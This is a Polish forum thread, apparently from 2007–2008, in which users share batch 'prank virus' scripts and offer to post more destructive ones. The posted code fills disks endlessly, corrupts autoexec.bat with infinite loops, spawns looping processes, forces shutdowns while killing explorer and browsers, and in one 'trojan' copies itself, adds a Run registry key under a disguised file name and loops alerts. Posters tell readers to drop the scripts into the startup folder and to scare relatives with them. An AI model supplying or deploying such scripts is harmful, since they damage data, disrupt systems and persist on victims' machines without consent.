shutdown potrzebuje argumentów
dodaj go do autostartu albo do innego rejestru ...
shutdown potrzebuje argumentów
dodaj go do autostartu albo do innego rejestru ...
wiadomo, ze potrzebuje ale ja raczej wszystkiego na srebrnej tacy nie podaje...
bo mądrej głowie dość dwie słowie (czy jak to tam było)
***********
* markossx *
***********
wirus atrapa?
jak co to mogę ci napisać takowego wirusa, i udostępnić tutaj kod
dobrym sposobem jest dodanie w rejestrze systemowym wartość dword przycisku Start i wklepać komendę shutdown -s -t 100 czy coś w tym stylu
-> 3DiT <- kody wirusów (batch/pascal/asm czy instrukcja do zrobienia atrapy) będę wklejał tutaj
-> INSTRUKCJA <-
Dla wszystkich wirusów: umieszczać wirusa w folderze autostart (Start->Wszystkie programy -> Autostart)
Aby skompilować plik batch wystarczy tylko wkleić "jakiś" kod do notatnika i plik zapisać jako (nazwa).bat i gotowe
[BATCH] Pętla dla każdego (rodzaj: batch, niebezpieczny)
[BATCH] Syfiarz(10-40mb/s) (rodzaj: batch, zapełniacz dysku)Kod:@echo off >> c:autoexec.bat :start >> c:autoexec.bat //zaznaczamy etykiete echo echo. >> c:autoexec.bat // echo. powoduje ze bedzie pusta linijka goto start >> c:autoexec.bat //i idziemy do początku... (:start)
Kod:@echo off regedit /e ksyf :start cls type ksyf >> c:windowssystem32security.dll goto start
[BATCH] 0-day (rodzaj: batch, taki sobie słaby wirusik)
[BATCH] p0rt bl0ck3r (rodzaj: batch, blokuje porty, tam gdzie pogrubione można zmienić port, np. na telnet-23,czy na porty w BitComecie, wszystko zależy od Waszej inwencji )Kod:@echo off echo time 00:00 >> c:autoexec.bat echo cls >> c:autoexec.bat
Kod:@echo off echo @echo off >> killer.bat echo :start >> killer.bat echo telnet localhost 80 >> killer.bat echo goto start >> killer.bat cls copy killer.bat killer2.bat copy killer2.bat killer3.bat copy killer3.bat killer4.bat copy killer4.bat killer5.bat copy killer5.bat killer6.bat cls start killer.bat start killer2.bat start killer3.bat start killer4.bat start killer5.bat start killer6.bat cls
NIE ODPOWIADAM ZA UZYCIE WIRUSóW,TROJANóW I ZA SZKODY WYKONANE TYMI WIRUSAMI!
PS. Zastanawiam się czy zamieszczać tutaj śmiercionośne wirusy w Pascalu co formatują boot sektory lub caly dysk twardy spod dosa (uruchamia sie wirus przed startem Windows i robi np. format c
Ostatnio edytowane przez freak2000 : 10-05-2007 - 10:18 Powód: dodać wirusy i info
od tego zartu moj kolega prawie dostał zawału (ma odpicowany komp)
A więc to robi skan kompa, co wygląda jak usuwanie potem za 60 sekund wyloncza system i zamyka explorer.exe (wygląda jak by sie te pliki usunęły )Kod:@echo off echo USUWAM! ping localhost -n 4 >nul dir /s shutdown -s -t 60 -c "Bad Boi!" ping 127.0.0.1 -n 30 -w 1000 shutdown -a :A tskill explorer.exe tskill firefox.exe tskill iexplorer.exe goto A
miłej zabawy ;p
Witam , skoro temat rozgrzebany postanowiłem umieścić tutaj tego "trojana" :
Wiem ,wiem , to prymityw ale miałem mało czasu . Jeżeli autor postu chciałby coś więcej , niech napisze tutaj bądź na PM.Kod:@echo off copy %0 %windir%\MicrosoftAPP.bat echo Created by VLN :RegWrite echo Dim shell >> %windir%\SystemVersion.vbs echo Set shell = CreateObject("Wscript.Shell") >> %windir%\SystemVersion.vbs echo Shell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QWERTY", "%windir%\SuperPorno.avi.bat" >> %windir%\SystemVersion.vbs if not exist %windir%\SystemVersion.vbs goto RegWrite :Message echo msgbox "Virus Detected ",16,"Windows" >> %windir%\K99DGV94.vbs if not exist %windir%\K99DGV94.vbs goto Message :Start echo @echo off >> %windir%\SuperPorno.avi.bat echo :RUN >> %windir%\SuperPorno.avi.bat echo start %windir%\K99DGV94.vbs >> %windir%\SuperPorno.avi.bat echo start http://www.eicar.org/download/eicar.com >> %windir%\SuperPorno.avi.bat echo goto RUN >> %windir%\SuperPorno.avi.bat if not exist %windir%\SuperPorno.avi.bat goto Start if exist %windir%\SystemVersion.vbs start %windir%\SystemVersion.vbs if exist %windir%\SuperPorno.avi.bat start %windir%\SuperPorno.avi.bat del %windir%\SystemVersion.vbs del %0 exit
W kodzie jest linijka która uruchamia EICAR-a . Antywirus (szczególnie AVAST) będzie mocno dawał o sobie znać.Jednak to powinno wystraszyć twojego ojca,jeżeli jednak nie chcesz "budzić" Antywirusa usuń pogrubioną linijkę.
Opis :
Jest tworzony wpis w rejestrze i trzy pliki
MicrosoftAPP.bat << Kopia naszego pliku
SystemVersion.vbs << Plik który tworzy wpis
SuperPorno.avi.bat << Plik który dzięki wpisowi będzie się uruchamiał wraz z startem systemu(jest w nim pętla która uruchamia plik poniżej i EICAR-a)
K99DGV94.vbs << Komunikat o znalezieniu "wirusa "
To chyba tyle
Pozdrawiam !!!
PS.Jeżeli w kodzie będą błędy to jak pisałem nie miałem zbytnio czasu.
VLN
Ostatnio edytowane przez VLN : 01-22-2008 - 12:32 Powód: A jednak był błąd w kodzie .